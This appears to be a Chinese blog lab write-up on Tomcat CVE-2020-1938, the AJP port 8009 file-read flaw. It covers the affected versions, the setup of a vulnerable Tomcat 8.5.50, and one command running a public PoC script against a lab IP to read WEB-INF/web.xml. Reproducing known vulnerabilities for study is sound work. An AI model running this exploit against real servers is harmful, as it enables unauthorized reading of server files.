Tomcat漏洞CVE-2020-1938 读文件漏洞
2020-07-24 本文已影响0人
阿尼奥赛哟
1. 漏洞原理
此漏洞的由于Tomcat默认开启的AJP服务(8009端口) 存在一处文件包含缺陷, 攻击者
可构造恶意的请求包进行文件包含操作, 进而读取受影响Tomcat服务器上的Web目录文件。
影响版本:
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
2. 环境搭建
1. 安装jdk
[root@localhost bin]# yum install java
2. 将apache-tomcat-8.5.50.tar.gz 解压到/opt下
[root@localhost opt]# tar xvfz apache-tomcat-8.5.50.tar.gz
3. 运行tomcat
[root@localhost opt]# cd /opt/apache-tomcat-8.5.50/bin
[root@localhost bin]# ./startup.sh
![](https://img.haomeiwen.com/i19560005/472f3e38ad7c0e97.png)
默认开启的8009如下图所示
![](https://img.haomeiwen.com/i19560005/8f04bfd5fabf3ccf.png)
4. 使用kali扫描目标机
![](https://img.haomeiwen.com/i19560005/d7d9c6811dd84b64.png)
3. 漏洞验证
1.POC下载
![](https://img.haomeiwen.com/i19560005/96a238eb9631f5e6.png)
2. POC验证
root@kali:/opt/cv-tomcat# python ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 172.16.22.196 -p 8009 -f WEB-INF/web.xml
读取的是/opt/apache-tomcat-8.5.50/webapps/ROOT/WEB-INF的文件
![](https://img.haomeiwen.com/i19560005/3df524e7f84604bd.png)